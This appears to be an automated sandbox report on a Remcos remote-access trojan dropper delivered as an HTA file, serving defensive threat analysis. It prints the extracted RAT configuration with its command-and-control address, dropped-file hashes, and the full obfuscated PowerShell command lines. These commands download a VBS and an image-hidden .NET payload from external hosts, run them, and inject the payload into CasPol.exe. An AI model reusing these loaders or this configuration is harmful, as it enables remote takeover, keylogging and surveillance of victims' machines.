remcos | 5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
05-02-2025 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1.hta
Size

14KB
MD5

938e35be516181974704aa4670095460
SHA1

754242d1bf355648fbd2391736af51cc6b3d14c3
SHA256

5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1
SHA512

7cbdd534e019a0cddc385b962b9bdfccd6da760236f7b1687ace056479025269b60fccb10bc20de346f748d42f514c8d0695658dda75212ef076a267c49e9baf
SSDEEP

96:NAT+4S9AT74SMuVNUtCPAT3ATJO4S7ATg:N4Q94V+CP434G74g

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
16	4056	powershell.exe
19	4784	powershell.exe
23	4784	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
5072	cmd.exe
4056	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4784 set thread context of 4640	4784	powershell.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4056	powershell.exe
4056	powershell.exe
4784	powershell.exe
4784	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4640	CasPol.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 5072	4584	mshta.exe	86
PID 4584 wrote to memory of 5072	4584	mshta.exe	86
PID 4584 wrote to memory of 5072	4584	mshta.exe	86
PID 5072 wrote to memory of 4056	5072	cmd.exe	88
PID 5072 wrote to memory of 4056	5072	cmd.exe	88
PID 5072 wrote to memory of 4056	5072	cmd.exe	88
PID 4056 wrote to memory of 408	4056	powershell.exe	89
PID 4056 wrote to memory of 408	4056	powershell.exe	89
PID 4056 wrote to memory of 408	4056	powershell.exe	89
PID 408 wrote to memory of 372	408	csc.exe	90
PID 408 wrote to memory of 372	408	csc.exe	90
PID 408 wrote to memory of 372	408	csc.exe	90
PID 4056 wrote to memory of 3040	4056	powershell.exe	91
PID 4056 wrote to memory of 3040	4056	powershell.exe	91
PID 4056 wrote to memory of 3040	4056	powershell.exe	91
PID 3040 wrote to memory of 4784	3040	WScript.exe	92
PID 3040 wrote to memory of 4784	3040	WScript.exe	92
PID 3040 wrote to memory of 4784	3040	WScript.exe	92
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96
PID 4784 wrote to memory of 4640	4784	powershell.exe	96

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5e4a54ebcde1ef6692e7a44b42ee370999babef758cc42b54d09138628e4afe1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWersHeLl.EXE -EX bYpAsS -NOp -w 1 -c DeviCEcREdENtiAlDeplOYMENT.ExE ; IeX($(ieX('[SYsTem.teXt.EnCOding]'+[cHar]58+[cHAR]58+'UTF8.GeTSTriNG([SYSTEM.cOnVErt]'+[chAr]58+[cHar]58+'FRomBASE64StRIng('+[chAr]0X22+'JDFKbDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZGVGaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGlaVWx5SHdzZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWFZXaFMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ09Pa29aaWZLRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUpvc1ZHcGMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmhRWUliKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2RNaGVCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBd3N0bW9UWWdNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSmw2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjE3LjE2MC4xNjMuMTEzLzY2OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lZm9yLmdJRiIsIiRlbnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lLnZicyIsMCwwKTtzdGFydC1TTGVlUCgzKTtJTlZPS0UtaXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kYW5kZ3JlYXRuZXNzdGhpbmdzZW50aXJldGltZS52YnMi'+[chAR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWersHeLl.EXE -EX bYpAsS -NOp -w 1 -c DeviCEcREdENtiAlDeplOYMENT.ExE ; IeX($(ieX('[SYsTem.teXt.EnCOding]'+[cHar]58+[cHAR]58+'UTF8.GeTSTriNG([SYSTEM.cOnVErt]'+[chAr]58+[cHar]58+'FRomBASE64StRIng('+[chAr]0X22+'JDFKbDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZGVGaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Umxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGlaVWx5SHdzZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWFZXaFMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ09Pa29aaWZLRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUpvc1ZHcGMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmhRWUliKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2RNaGVCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBd3N0bW9UWWdNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSmw2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjE3LjE2MC4xNjMuMTEzLzY2OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lZm9yLmdJRiIsIiRlbnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RhbmRncmVhdG5lc3N0aGluZ3NlbnRpcmV0aW1lLnZicyIsMCwwKTtzdGFydC1TTGVlUCgzKTtJTlZPS0UtaXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kYW5kZ3JlYXRuZXNzdGhpbmdzZW50aXJldGltZS52YnMi'+[chAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ole4pca0\ole4pca0.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:408
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1901.tmp" "c:\Users\Admin\AppData\Local\Temp\ole4pca0\CSCDECDCE307F4340199BEF5B82A3A2B1EF.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:372
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodandgreatnessthingsentiretime.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAGcAbgBpAGsAbgBpAGgAdAB0AHMAZQBiAGgAdABpAHcAbgBvAGcAbgBpAG8AZwBzAHkAYQB3AGwAYQBzAGcAbgBpAGgAdAB0AHMAZQBiAC8AOQA2ADYALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4784
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
2e96f8504cf366453220cc1f03296e8f

SHA1
5dc9e97b805a8e50efc4620c2f293be2312ba61f

SHA256
89c5e87c480d43154e17070526faa23d01ad8e4ef0b78e8489fdc83c2528c48d

SHA512
9b0cbdcb626b54a326e74d92cea48893a003b736d91e2cada129e2a99496086aa0e6a62a7a9a047914e21ec8a7e51f33b16b9b87abc3aa47949cdd8dc778e4e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
415b616a92af510dde417393a8789aa2

SHA1
a3c96d389d109b7ace85c50092d66f8582d27a58

SHA256
6ee18f9c4f2adfc60d3b945cd0ce0d56f3283b1b8926b9819b9c7fce0863a9bd

SHA512
d9f360a97dab91d8a92a1485aa4fb5ca608a34d9c40f7972f1411a5407ebb5f557c9a516be7b238ecaaf7493029e53602c07041612298d54e64eb8a5fa073bb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1901.tmp

Filesize
1KB

MD5
315cca4d7da4afcd422a40e5c0e9b09d

SHA1
4c3f8fe839611f6919e4949875eee13e2533fc8f

SHA256
a2a43124f957daf204a50c118261110610ada45b3c609b342f143fd2e7ed69a0

SHA512
5d805536954436acd693b5a6995471b1f11a631ef270325f56b8875411fb8b6407edeef090dd580a328507567b9e26d36572b0ca059f39ccf9a26c24a843d242

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2pdqqen.gas.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ole4pca0\ole4pca0.dll

Filesize
3KB

MD5
5c7312b8d9ed5e7d90435cb473e4e0b1

SHA1
6b97e26a82de5e88f7430dffce2fc1ea6dcf73b9

SHA256
04fd8f69b3b9dc9a5960d2aec6fc154592a8f87d1c8387a673a6001772d1b82b

SHA512
f9cdcb8f48a6a132096abaaecf74f5f96376c57d27ed8a0f66e5510a63e89686097a7d49be0fc842e1f8c8541b3f630f69248ce579ddbb2572dcade90ceb7c61

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodandgreatnessthingsentiretime.vbs

Filesize
229KB

MD5
84cee61b12d317192efd143b48e3e9a8

SHA1
4a9bc4873ad6ca101f6802da2dbd5add3c0b4914

SHA256
77ac7ada2e64beee29a7e5d2f73280d49a0ed825e8a97f15bc0719a558d3c695

SHA512
983e5ddd6e7cf3803c0dd64c7d8ca381d56755c2529cca96659c183ec2fd1839c659634beb420a706083417091d420573ee61c3bca797fd1d97d768713e7c63e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ole4pca0\CSCDECDCE307F4340199BEF5B82A3A2B1EF.TMP

Filesize
652B

MD5
17944468b6475795536561e7e723137a

SHA1
7ad8ad0073154cdb426c9556d2ae95830c165abc

SHA256
39c146ef6b28f091383286f325a1eed58034322cb36a5d0aae3218669d6dba1b

SHA512
7327e6fabded691b4ba68a77cf4e33124d6f4b6f810db8482e293b7adca59a8e13914b19cd0656362e4ebc00dd2e353e4268759793584ae6e3d42c161c753c97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ole4pca0\ole4pca0.0.cs

Filesize
493B

MD5
6c7f5f6019ccbb0a40a74f81a393e073

SHA1
8e888a89826da91fea21a64fc13e39bb1daa6d5b

SHA256
dbb24f29108f30b087c8e06d36c4b55929e5dc412c048b8b4ba867cfed2a3b42

SHA512
0692e922d4a2e553752665313f8894ceaefad68ba43172db67e3e26a6f020a5824416f855933fba935c388b034794097c0f62edd2dc15dee355ce8b50b32fac9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ole4pca0\ole4pca0.cmdline

Filesize
369B

MD5
585ceff182b1cf78aeaf905feef22a74

SHA1
69fd3a51cd255864ad6b5d9029ec68890b59a931

SHA256
6a496f77aff589de48f447a4bcec6fef41f01672f64aed9667315eb47ca98c08

SHA512
9bfa28ba80332d89b545f163b1de639c3aa81cd5a01ef5c4ce71a24dae1a32c3eb253de5e3d763280f2a5642f5ce59036a40c4c0902a8702f95b6bf3f4301d11

Download Submit
memory/4056-35-0x00000000077F0000-0x0000000007893000-memory.dmp

Filesize
652KB

Download
memory/4056-66-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-20-0x00000000074F0000-0x0000000007522000-memory.dmp

Filesize
200KB

Download
memory/4056-22-0x000000006D850000-0x000000006D89C000-memory.dmp

Filesize
304KB

Download
memory/4056-21-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-34-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-0-0x0000000070F9E000-0x0000000070F9F000-memory.dmp

Filesize
4KB

Download
memory/4056-33-0x0000000007530000-0x000000000754E000-memory.dmp

Filesize
120KB

Download
memory/4056-36-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-23-0x000000006DBC0000-0x000000006DF14000-memory.dmp

Filesize
3.3MB

Download
memory/4056-37-0x0000000007F20000-0x000000000859A000-memory.dmp

Filesize
6.5MB

Download
memory/4056-38-0x00000000052B0000-0x00000000052CA000-memory.dmp

Filesize
104KB

Download
memory/4056-39-0x0000000007920000-0x000000000792A000-memory.dmp

Filesize
40KB

Download
memory/4056-40-0x0000000007B40000-0x0000000007BD6000-memory.dmp

Filesize
600KB

Download
memory/4056-41-0x0000000007AA0000-0x0000000007AB1000-memory.dmp

Filesize
68KB

Download
memory/4056-42-0x0000000007AD0000-0x0000000007ADE000-memory.dmp

Filesize
56KB

Download
memory/4056-43-0x0000000007AE0000-0x0000000007AF4000-memory.dmp

Filesize
80KB

Download
memory/4056-44-0x0000000007B20000-0x0000000007B3A000-memory.dmp

Filesize
104KB

Download
memory/4056-45-0x0000000007B10000-0x0000000007B18000-memory.dmp

Filesize
32KB

Download
memory/4056-18-0x0000000006530000-0x000000000654E000-memory.dmp

Filesize
120KB

Download
memory/4056-17-0x0000000005F40000-0x0000000006294000-memory.dmp

Filesize
3.3MB

Download
memory/4056-6-0x0000000005E60000-0x0000000005EC6000-memory.dmp

Filesize
408KB

Download
memory/4056-7-0x0000000005ED0000-0x0000000005F36000-memory.dmp

Filesize
408KB

Download
memory/4056-58-0x0000000007B10000-0x0000000007B18000-memory.dmp

Filesize
32KB

Download
memory/4056-5-0x0000000005C40000-0x0000000005C62000-memory.dmp

Filesize
136KB

Download
memory/4056-60-0x0000000070F9E000-0x0000000070F9F000-memory.dmp

Filesize
4KB

Download
memory/4056-61-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-19-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/4056-67-0x0000000007DB0000-0x0000000007DD2000-memory.dmp

Filesize
136KB

Download
memory/4056-68-0x0000000008B50000-0x00000000090F4000-memory.dmp

Filesize
5.6MB

Download
memory/4056-4-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-74-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-2-0x0000000070F90000-0x0000000071740000-memory.dmp

Filesize
7.7MB

Download
memory/4056-3-0x0000000005610000-0x0000000005C38000-memory.dmp

Filesize
6.2MB

Download
memory/4056-1-0x0000000004F70000-0x0000000004FA6000-memory.dmp

Filesize
216KB

Download
memory/4640-108-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-128-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-94-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-95-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-91-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-102-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-135-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-134-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-103-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-109-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-114-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-116-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-121-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-122-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4640-127-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
